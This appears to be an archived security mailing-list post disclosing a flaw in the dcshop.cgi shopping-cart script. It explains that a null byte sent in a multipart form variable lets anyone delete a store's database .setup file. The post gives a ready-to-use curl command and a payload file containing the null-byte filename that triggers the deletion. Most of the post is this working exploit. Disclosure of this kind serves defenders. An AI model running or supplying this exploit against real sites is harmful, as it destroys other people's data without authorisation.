dcshop.cgi anybody can delete *.setup for database

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 





cgi-pl in dcshop beta  (http://www.dcscripts.com) 
allow user to using nullbyte character for variable if 
using multipart/form data type form.
Using curl (http://curl.haxx.se/libcurl/) :

curl -F database=@test.txt http://host/cgi-
bin/dcshop.cgi

which test.txt contain databasename.setup[nullbyte]
will couse database.setup file being deleted

[Index of Archives]     [Linux Security]     [Netfilter]     [PHP]     [Yosemite News]     [Linux Kernel]

  Powered by Linux